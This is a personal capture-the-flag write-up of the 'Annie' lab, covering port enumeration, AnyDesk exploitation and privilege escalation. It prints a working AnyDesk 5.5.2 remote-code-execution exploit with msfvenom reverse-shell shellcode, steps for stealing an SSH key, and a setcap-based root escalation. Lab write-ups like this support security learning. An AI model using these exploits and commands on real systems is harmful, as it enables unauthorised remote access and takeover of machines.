Annie Ctf
Table of Contents
This lab was relativey simple but taught me a lot of things
Enumeration
The thing I like to do is find all the open ports with rustscan and then run nmap for futher analysis, it makes my thing faster by about 10 minutes. So I ran these following commands
rustscan -a $ip -b 65535 -u 5000 | tee rustscan
Then I run nmap on the found ports
sudo nmap $ip -p xxx,xxx -sV -sC
I saw that two ports were open, One was ssh on 22 and real server on 7070
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
7070/tcp open realserver?
Well this wasn’t really enough for me so I just started using nmap scripts and on the first script I ran which was something like this
nmap $ip -p 22,7070 --script=safe
I found out that 7070 was running anydesk and I was like “Ok, the lab name makes sense now, and I started looking for vulnerabilties on anydesk like doing searchsploit”
searchsploit anydesk
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation | windows/local/40410.txt
AnyDesk 5.4.0 - Unquoted Service Path | windows/local/47883.txt
AnyDesk 5.5.2 - Remote Code Execution | linux/remote/49613.py
AnyDesk 7.0.15 - Unquoted Service Path | windows/local/51968.txt
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
well it was not obvious what exploit we need to run so I just googled anydesk exploits too and found out an exploit in exploit-database modified it and ran
Did I get an Reverseshell? Yes well obviously but I learnt quite a lot in this phase, like the port we need to connect to is not 7070 but another port which anydesk uses with udp so yeah and I made a shellcode like they told me to in the exploit, if you are tackling a lot of problems with that exploit version you can try using another exploit from another site or just copy mine but change the ip and the shellcode
# Exploit Title: AnyDesk 5.5.2 - Remote Code Execution
# Date: 09/06/20
# Exploit Author: scryh
# Vendor Homepage: https://anydesk.com/en
# Version: 5.5.2
# Tested on: Linux
# Walkthrough: https://devel0pment.de/?p=1881
import struct
import socket
Note changes have been made from the original exploit
ip = '10.10.29.248'// Change This
port = 50001 // No Need To Change This Since Anydesk uses UDP ports for screensharing purposes
def gen_discover_packet(ad_id, os, hn, user, inf, func):
d = b'\x3e\xd1\x01'
d += struct.pack('>I', ad_id)
d += struct.pack('>I', 0)
d += b'\x02' + bytes([os])
d += struct.pack('>I', len(hn)) + hn
d += struct.pack('>I', len(user)) + user
d += struct.pack('>I', 0)
d += struct.pack('>I', len(inf)) + inf
d += b'\x00'
d += struct.pack('>I', len(func)) + func
d += b'\x02\xc3\x51'
return d
# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
shellcode = b"" // Make sure to generate the msfvenom reverse shell payload and replace the shellcode below
shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48"
shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\x39\xe2\xbf"
shellcode += b"\x91\x75\x37\x67\xa8\x48\x31\x58\x27\x48\x2d"
shellcode += b"\xf8\xff\xff\xff\xe2\xf4\x53\xcb\xe7\x08\x1f"
shellcode += b"\x35\x38\xc2\x38\xbc\xb0\x94\x3d\xa0\x2f\x11"
shellcode += b"\x3b\xe2\xae\xcd\x7f\x3a\x79\xad\x68\xaa\x36"
shellcode += b"\x77\x1f\x27\x3d\xc2\x13\xba\xb0\x94\x1f\x34"
shellcode += b"\x39\xe0\xc6\x2c\xd5\xb0\x2d\x38\x62\xdd\xcf"
shellcode += b"\x88\x84\xc9\xec\x7f\xdc\x87\x5b\x8b\xd1\xbe"
shellcode += b"\x06\x5f\x67\xfb\x71\x6b\x58\xc3\x22\x7f\xee"
shellcode += b"\x4e\x36\xe7\xbf\x91\x75\x37\x67\xa8"
print('sending payload ...')
p = gen_discover_packet(4919, 1, b'\x85\xfe%1$*1$x%18x%165$ln' + shellcode, b'\x85\xfe%18472249x%93$ln', b'ad', b'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()
print('reverse shell should connect within 5 seconds')
This is also copied from Joseph Alan
Make sure you are running netcat on the another tab and you will connect, you can either use that shell or just go to /home/annie/.ssh and you’ll find id_rsa copy that and save that in your system. After that get the passphrase, if you don’t know how to get the passphrase from an ssh key do
Once you get the passphrase connect it through ssh doing something like
ssh -i key annie@$ip
Say yes the fingerprint and put the passphrase when asked, boom now you are in the shell
Privelege Escalation
As always you should look through the common files to check for any clue or even look for annie’s password like .bash_history or run command env
But one of it worked for me so I ran a command which was
find / -perm /4000 2>/dev/null
It shows us the programs that can run with evalated priveleges like root. And I did found something it was setcap
TBH, I didn’t know shit about it but it felt odd, so I looked into it and found this
annie@desktop:~$ find / -perm /4000 2>/dev/null ```
*/sbin/setcap*
annie@desktop:~$ cd /tmp
annie@desktop:/tmp$ cp /usr/bin/python3 .
annie@desktop:/tmp$ /sbin/setcap cap_setuid+ep /tmp/python3
annie@desktop:/tmp$ ./python3 -c "import os;os.setuid(0);os.system('/bin/bash')"
root@desktop:/tmp# cd /root/
root@desktop:/root# cat root.txt
[REDACTED FOR GOOD]
root@desktop:/root#
Mindfucked? Lemme elaborate
- You are copying Python to `/tmp/` and giving it the ability to change its user ID (via `cap_setuid`).
- This could be used to run commands or scripts with elevated privileges, potentially allowing you to execute code as another user (like `root`).
- - Normally, only root or processes with `setuid` privileges can change the user ID of a running process.
- By giving the Python binary the `cap_setuid` capability, you are allowing it to change its user ID (potentially to root) without being a privileged user.
I hope now you got it, I'm also a noob in this field but I try to write writeups to learn myself more than teaching others. Have a good day!!! BTW I hate Elon Musk```